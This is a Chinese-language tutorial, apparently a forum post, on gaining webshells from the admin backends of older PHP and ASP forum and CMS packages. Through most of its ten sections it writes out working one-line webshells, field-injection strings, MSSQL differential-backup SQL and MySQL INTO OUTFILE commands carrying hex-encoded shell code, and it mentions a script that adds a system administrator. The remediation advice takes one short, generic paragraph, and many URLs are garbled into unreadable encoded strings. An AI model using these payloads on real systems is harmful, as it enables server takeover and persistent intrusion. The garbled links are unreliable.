一、直接上传获得webshell
这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是
82bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3k6G2M7Y4g2E0M7#2)9J5c8X3W2E0j5h3N6W2M7#2)9J5c8Y4y4E0K9h3I4W2M7#2)9J5c8W2!0q4y4q4!0n7z5q4)9^5b7W2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4g2)9^5z5g2)9^5c8q4!0q4y4q4!0n7z5q4)9^5x3q4!0q4z5g2)9&6z5q4!0n7y4g2!0q4y4g2!0m8c8q4)9&6x3q4!0q4y4#2)9&6b7g2)9^5y4q4!0q4z5q4)9^5x3g2)9&6y4q4!0q4y4q4!0n7b7#2)9&6y4#2!0q4y4W2!0n7z5q4!0n7z5q4!0q4y4W2)9^5z5q4)9^5c8W2!0q4y4#2!0m8b7W2)9&6z5g2!0q4y4g2)9&6x3W2)9^5b7#2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4W2)9&6z5q4)9&6x3#2!0q4y4#2)9&6b7g2)9^5y4r3A6K6M7q4!0q4y4#2!0n7x3#2!0n7b7W2!0q4y4#2!0n7b7W2)9&6c8W2!0q4y4W2!0n7b7#2)9^5c8W2!0q4y4W2!0n7y4q4)9&6c8g2!0q4y4g2!0n7x3q4!0n7x3g2!0q4y4g2)9^5c8W2!0m8c8W2!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4#2)9&6b7W2!0n7y4q4!0q4y4W2)9^5c8g2!0m8y4g2!0q4y4q4!0n7z5q4)9^5b7g2!0q4y4q4!0n7b7#2!0m8x3r3A6K6M7q4!0q4y4W2)9&6y4W2)9^5y4#2!0q4y4q4!0n7b7W2!0n7y4W2!0q4x3#2)9^5x3q4)9^5x3W2!0q4y4W2)9&6y4W2)9^5y4#2!0q4y4q4!0n7b7W2!0n7y4W2!0q4y4g2)9&6x3q4)9^5c8q4!0q4y4W2)9&6z5q4!0m8c8W2!0q4y4g2)9^5c8g2)9&6c8W2!0q4y4W2)9&6c8q4!0m8y4g2!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4W2)9&6y4W2)9^5y4#2!0q4y4q4!0n7b7W2!0n7y4W2!0q4y4g2)9&6x3q4)9^5c8q4!0q4c8W2!0n7b7#2)9^5b7$3u0G2i4K6u0V1j5X3I4G2k6#2!0q4y4g2)9&6x3q4)9^5c8g2!0q4y4g2)9^5c8W2!0n7x3q4!0q4y4g2)9^5c8W2!0m8c8W2!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4g2)9^5c8W2!0m8c8W2!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4#2)9&6b7W2!0n7y4q4!0q4y4W2)9^5c8g2!0m8y4g2!0q4y4q4!0n7z5q4)9^5b7g2!0q4y4q4!0n7b7#2!0m8x3q4)9J5k6i4m8Z5M7q4!0q4y4W2)9&6y4W2)9^5y4#2!0q4y4q4!0n7b7W2!0n7y4W2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7z5q4)9^5b7g2!0q4y4q4!0n7b7#2!0m8x3q4!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4W2)9&6y4W2)9^5y4#2!0q4y4q4!0n7b7W2!0n7y4W2!0q4z5q4!0n7y4#2!0m8c8W2!0q4y4g2!0n7c8g2)9^5y4q4!0q4y4W2)9&6b7#2)9^5z5g2!0q4y4W2)9^5c8W2)9&6x3q4!0q4y4#2!0m8y4q4!0n7b7g2!0q4x3#2)9^5x3q4)9^5x3W2!0q4y4q4!0n7b7W2!0m8y4g2!0q4y4g2)9^5c8W2)9^5b7g2!0q4y4q4!0n7z5q4)9^5x3q4!0q4y4g2!0n7z5g2!0n7y4q4!0q4y4g2)9^5z5g2)9^5c8q4!0q4y4g2)9^5c8q4)9^5x3g2!0q4y4g2)9^5z5q4)9^5y4W2!0q4y4W2!0n7y4g2)9^5x3g2!0q4z5q4!0m8x3g2)9^5b7#2!0q4y4#2)9&6b7g2)9^5y4s2g2H3k6X3W2D9k6g2)9J5k6h3q4K6M7q4!0q4y4W2!0n7b7#2)9^5c8W2!0q4y4W2!0n7y4q4)9&6c8g2)9J5z5q4!0q4y4g2)9^5b7g2!0m8z5q4!0q4y4#2!0n7c8q4)9&6x3e0g2Q4x3X3f1H3i4@1f1#2i4K6V1J5i4K6S2o6y4W2)9J5k6e0m8Q4c8e0y4Q4z5o6m8Q4z5o6q4Q4c8e0k6Q4z5e0N6Q4b7e0W2Q4c8e0k6Q4z5f1y4Q4z5f1k6Q4c8e0N6Q4z5f1q4Q4z5o6c8Q4c8e0S2Q4b7f1g2Q4b7U0S2Q4c8e0g2Q4b7e0c8Q4z5f1q4Q4c8e0k6Q4z5e0g2Q4b7U0c8Q4c8e0N6Q4b7f1u0Q4z5e0W2Q4c8e0N6Q4b7U0y4Q4b7V1u0Q4c8e0N6Q4b7V1u0Q4z5f1k6Q4x3U0W2Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4z5f1u0Q4b7e0m8Q4c8e0S2Q4b7V1k6Q4z5o6N6Q4c8e0k6Q4b7V1u0Q4b7e0c8Q4c8e0c8Q4b7U0S2Q4z5p5q4Q4c8e0c8Q4b7V1y4Q4b7e0m8Q4c8e0k6Q4z5e0k6Q4z5o6N6Q4c8e0c8Q4b7V1u0Q4b7U0k6Q4c8e0c8Q4b7U0S2Q4z5p5c8Q4c8e0c8Q4b7U0S2Q4b7e0g2Q4c8f1k6Q4b7V1y4Q4z5p5y4Q4c8e0g2Q4b7f1k6Q4b7V1y4Q4c8e0S2Q4z5o6N6Q4b7U0c8Q4c8e0N6Q4z5e0c8Q4b7e0S2Q4c8e0k6Q4z5o6S2Q4b7U0N6Q4c8e0g2Q4z5p5k6Q4b7f1k6Q4c8e0c8Q4b7V1u0Q4b7e0g2Q4c8e0N6Q4z5f1u0Q4b7U0c8Q4c8e0k6Q4z5p5g2Q4b7e0g2Q4c8e0c8Q4b7U0S2Q4z5p5q4Q4c8e0c8Q4b7V1y4Q4b7e0m8%4k6h3u0K6K9r3g2D9L8q4!0q4y4g2)9^5z5q4!0n7x3q4!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2!0q4y4q4!0n7b7W2!0n7b7W2!0q4y4W2)9^5y4q4)9^5c8W2!0q4y4g2)9^5c8W2!0m8c8W2!0q4y4g2)9^5y4W2)9&6z5g2!0q4y4#2)9&6b7W2!0m8c8g2!0q4y4g2!0n7c8q4)9&6y4g2!0q4y4q4!0n7z5q4!0m8c8q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7b7W2)9^5c8g2!0q4z5q4)9^5x3q4)9^5b7#2!0q4y4W2)9^5b7W2!0n7c8W2!0q4y4g2)9^5z5q4!0n7x3q4!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4#2!0m8c8g2!0m8x3g2!0q4y4#2)9&6x3q4)9^5y4W2!0q4y4g2)9&6x3g2)9&6z5q4!0q4y4W2)9^5c8g2!0m8y4#2!0q4y4g2)9^5z5q4!0n7y4W2!0q4y4W2)9&6c8q4)9^5x3#2!0q4z5g2)9&6z5g2)9&6x3q4!0q4x3#2)9^5x3q4)9^5x3R3`.`.
二、添加修改上传类型
现在很多的脚本程序上传模块不是只允许上传合法文件类型,而大多数的系统是允许添加上传类型,bbsxp后台可以添加asa|asP类型,ewebeditor的后台也可添加asa类型,通过修改后我们可以直接上传asa后缀的webshell了,还有一种情况是过滤了.asp,可以添加.aspasp的文件类型来上传获得webshell。php系统的后台,我们可以添加.php.g1f的上传类型,这是php的一个特性,最后的哪个只要不是已知的文件类型即可,php会将php.g1f作为.php来正常运行,从而也可成功拿到shell。LeadBbs3.14后台获得webshell方法是:在上传类型中增加asp ,注意,asp后面是有个空格的,然后在前台上传ASP马,当然也要在后面加个空格!
三、利用后台管理功能写入webshell
上传漏洞基本上补的也差不多了,所以我们进入后台后还可以通过修改相关文件来写入webshell。比较的典型的有dvbbs6.0,还有leadbbs2.88等,直接在后台修改配置文件,写入后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。
四、利用后台管理向配置文件写webshell
利用”"”":”"//”等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上cnhacker at 263 dot net”:eval request(chr (35))//, 在配制文件中就是webmail=”cnhacker at 263 dot net\”:eval request(chr(35))//”,还有一种方法就是写上
cnhacker at 263 dot net”%><%eval request(chr(35))%><%’,这样就会形成前后对应,最小马也就运行了。<%eval request(chr(35))%>可以用lake2的eval发送端以及最新的2006 客户端来连,需要说明的是数据库插马时候要选前者。再如动易2005,到文章中心管理-顶部菜单设置-菜单其它特效,插入一句话马”%><%execute request(“l”)%><%’,保存顶部栏目菜单参数设置成功后,我们就得到马地址
cf9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2)9J5c8X3q4V1L8h3W2F1i4K6u0r3M7X3!0G2N6r3y4D9j5i4y4K6i4K6g2X3L8h3g2F1N6g2)9#2k6X3y4G2L8X3k6A6k6#2)9J5k6h3q4K6M7q4!0q4x3#2)9^5x3q4)9^5x3R3`.`.
五、利用后台数据库备份及恢复获得webshell
主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能,“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改 为asp,从而得到webshell,msssql版的程序就直接应用了access版的代码,导致sql版照样可以利用。还可以备份网站asp文件为其他后缀 如.txt文件,从而可以查看并获得网页源代码,并获得更多的程序信息增加获得webshell的机会。在实际运用中经常会碰到没有上传功能的时 候,但是有asp系统在运行,利用此方法来查看源代码来获得其数据库的位置,为数据库插马来创造机会,动网论坛就有一个ip地址的数据库,在后台的ip管理中可以插入最小马然后备份成.asp文件即可。在谈谈突破上传检测的方法,很多asp程序在即使改了后缀名后也会提示文件非法,通过在.asp文件头加上gif89a修改后缀为gif来骗过asp程序检测达到上传的目的,还有一种就是用记事本打开图片文件,随便粘贴一部分复制到asp木马文件头,修改gif后缀后上传也可以突破检测,然后备份为.asp文件,成功得到webshell。
六、利用数据库压缩功能
可以将数据的防下载失效从而使插入数据库的最小马成功运行,比较典型的就是loveyuki的L-BLOG,在友情添加的url出写上<%eval request (chr(35))%>, 提交后,在数据库操作中压缩数据库,可以成功压缩出.asp文件,用海洋的最小马的eval客户端连就得到一个webshell。
七、asp+mssql系统
这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单,代码如下:
<form action=
6c7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2)9J5c8X3u0T1M7#2)9J5c8X3q4V1L8h3W2F1i4K6g2X3k6r3q4@1j5g2)9J5k6h3q4K6M7q4)9K6c8X3q4U0N6r3W2G2L8W2)9K6c8q4u0W2M7%4c8G2M7X3g2p5j5i4c8S2i4K6t1$3j5h3y4@1i4K6y4p5f1X3g2K6N6r3!0J5k6b7`.`. method=”post”>
<p>已上传文件的位置:<input name=”Dbpath” type=”text” size=”80″></p>
<p>要复制到的位置:<input name=”backpath” type=”text” size=”80″></p>
<p><input type=”submit” value=”提交”></p> </form>
另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的WebShell的相对路径填写在“要复制到的位置”那里,提交就得到我们可爱的WebShell了,恢复代码和此类似,修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台,动网的数据库还原和备份是个摆设,不能执行sql命令备份webshell,只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码,利用动网7.0的注入漏洞可以用差异备份一个webshell,可以用利用上面提到的方法,将conn.asp文件备份成.txt文件而获得库名。
差异备份的主要代码:
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0×626273 backup database @a to disk=@s–
;Drop table [heige];create table [dbo] dot [heige] ([cmd] [image])–
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)–
;declare at a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT–
这段代码中,0×626273是要备份的库名bbs的十六进制,可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request(“l”)%>的十六进制,是lp最小马;0x643A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell,唯一的不足就是备份后的文件过大,如果备份数据库中有防下载的的数据表,或者有错误的asp代码,备份出来的webshell就不会成功运行,利用差异备份是成功率比较高的方法,并且极大的减少备份文件的大小。
八、php+mysql系统
后台需要有mysql数据查询功能,我们就可以利用它执行SELECT … INTO OUTFILE查询输出php文件,因为所有的数据是存放在mysql里的,所以我们可以通过正常手段把我们的webshell代码插入mysql在利用SELECT … INTO OUTFILE语句导出shell。在mysql操作里输入select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile ‘路径’ 就可以获得了一个<?eval($_POST[a]);?>的最小马
‘
0x3C3F6576616C
28245F504F53545B615D293B3F3E 是我们<?eval($_POST[a]);?>的十六进制,这种方法对phpmyadmin比较普遍,先利用phpmyadmin的路径泄露漏洞,比较典型的是
efbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4g2J5L8q4)9J5c8Y4m8Z5M7r3#2&6j5h3c8E0K9h3&6Q4x3V1k6D9K9h3u0J5j5e0W2^5K9h3q4G2k6i4y4Q4x3V1k6K6k6h3I4W2j5%4c8Q4y4h3k6D9j5h3&6Y4i4K6u0W2L8r3W2T1i4K6u0W2M7r3S2H3i4@1f1K6i4K6R3H3i4K6R3J5
就可以暴出路径,php环境中比较容易暴出绝对路径:)。提一点的是遇到是mysql在win系统下路径应该这样写d:\\wwwroot\\a.php。下面的方法是比较常用的一个导出webshell的方法,也可以写个vbs添加系统管理员的脚本导出到启动文件夹,系统重起后就会添加一个管理员帐号
CREATE TABLE a(cmd text NOT NULL)
INSERT INTO a(cmd) VALUES(‘<?fputs(fopen(“./a.php”,”w”),”<?eval(\$_POST[a]);?>”)?>’)
select cmd from a into outfile ‘路径/b.php’
DROP TABLE IF EXISTS a
访问b.php就会生成一个<?eval($_POST[a]);?>的最小马。
如果遇到可以执行php命令就简单多了,典型的代表是BO-BLOG,在后台的php命令框输入以下代码:
<?
$sa = fopen(“./up/saiy.php”,”w”);
fw9xiaote($sa,”<?eval(\$_POST[a]);?”.”>”);
fclose($sa);
?>
就会在up目录下生成文件名为saiy.php内容为<?eval($_POST[a]);?>的最小php木马,
最后用lanker的客户端来连接。实际运用中要考虑到文件夹是否有写权限。或者输入这样的代码<?fputs(fopen(“./a.php”,”w”),”<?eval(\$_POST[a]);?>”)?> 将会在当前目录生成一个a.php的最小马。
九、phpwind论坛从后台到webshell的三种方式
方式1 模板法
进入后台, 风格模版设置 ,在随便一行写代码,记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
p9xiaont <<<EOT
而后得到一个shell为
9c6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2)9J5c8X3u0T1M7#2)9J5c8X3W2F1k6r3g2^5i4K6u0W2M7r3S2H3i4@1f1K6i4K6R3H3i4K6R3J5
方始2 脏话过滤法
进入安全管理 ◇ 不良词语过滤。新增不良词语写 a’]=’aa’;eval($_POST[’a’]);//
替换为那里可以随意写,而后得到一个shell地址为
e23K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2)9J5c8X3u0T1M7#2)9J5c8X3c8S2N6r3q4Q4x3V1k6T1j5Y4y4U0j5h3y4Z5k6g2)9J5c8Y4N6G2M7X3c8K6k6X3u0Q4x3X3g2H3K9s2m8Q4c8e0y4Q4z5o6m8Q4z5o6t1`.
方式3 用户等级管理
新建立会员组,头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);// ,升级点数依然可以随意写。而后得到一个shell地址为
3a5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2)9J5c8X3u0T1M7#2)9J5c8X3c8S2N6r3q4Q4x3V1k6T1j5Y4y4U0j5h3y4Z5k6g2)9J5c8X3I4W2N6X3g2D9i4K6u0W2M7r3S2H3i4@1f1K6i4K6R3H3i4K6R3J5
以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。
十、也可以利用网站访问计数系统记录来获得webshell
最明显的就是某私服程序内的阿江计数程序,可以通过
60fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2)9J5c8Y4y4@1j5i4c8Q4x3X3g2S2M7%4m8Q4x3@1k6K6N6s2W2D9k6g2)9K6c8s2c8W2P5s2c8Q4x3U0k6J5k6h3k6W2M7X3g2J5i4K6y4p5 代码内容&screenwidth=1024直接提交,即可把代码内容直接插入到计数系统的数据库中,而此系统默认数据库为count#.asa,我们可以通过
f28K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2!0q4y4#2!0n7c8q4)9&6x3g2!0q4y4#2!0m8b7W2)9&6z5g2)9J5c8X3y4G2N6h3&6@1i4K6t1#2x3U0y4Q4x3X3g2S2M7$3q4Q4c8e0S2Q4b7f1g2Q4b7V1k6Q4c8e0W2Q4z5e0N6Q4b7f1g2Q4c8e0g2Q4b7V1g2Q4z5e0N6Q4c8e0g2Q4z5o6S2Q4b7U0m8%4k6h3u0K6K9r3g2D9L8q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4#2)9&6y4q4!0n7x3g2!0q4y4q4!0n7b7g2)9^5c8g2!0q4z5g2)9&6z5q4!0n7c8W2!0q4y4W2!0n7x3g2)9&6c8W2!0q4z5q4!0m8c8g2!0m8x3g2!0q4y4W2)9&6y4g2!0n7x3q4!0q4y4#2!0m8z5q4)9^5b7W2!0q4y4g2!0n7b7g2)9^5c8W2!0q4z5q4!0n7c8W2)9^5y4#2!0q4y4W2!0n7b7W2!0m8y4q4!0q4y4q4!0n7b7g2)9^5y4W2)9J5y4g2!0q4y4g2)9&6x3W2)9^5b7#2)9J5b7W2!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4g2!0n7x3q4)9^5y4W2!0q4y4W2)9&6b7#2)9^5x3q4!0q4y4g2!0n7x3q4)9^5c8W2!0q4z5g2!0m8z5g2!0m8b7#2!0q4y4W2)9&6y4q4!0n7z5g2!0q4y4W2)9^5z5q4)9&6x3q4)9J5y4X3I4@1i4K6y4n7f1@1y4d9d9g2m8f1 RUNAT=SERVER LANGUAGE=vbSCRIPT>eval(Request(“1″))</SCRIPT>替换代码内容处提交,然后用lake2的eval客户端来提交,值得一提的是如果进到计数后台,可以清理某时某刻的数据,一旦插入asp木马失败,可以清理数据库再次操作。
解决方案
由于本文涉及的代码版本很多,所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补,若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补,可以到相关官方网站下载最新补丁进行修复更新。同时也请大家能时刻关注各大安全网络发布的最新公告,若自己发现相关漏洞也可及时通知官方网站。
后记
其实,从后台得到webshell的技巧应该还有很多的,关键是要看大家怎么灵活运用、触类旁通,希望本文的方法能起到抛砖引玉的作用。 各位加油吧,让我们将服务器控制到底!
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课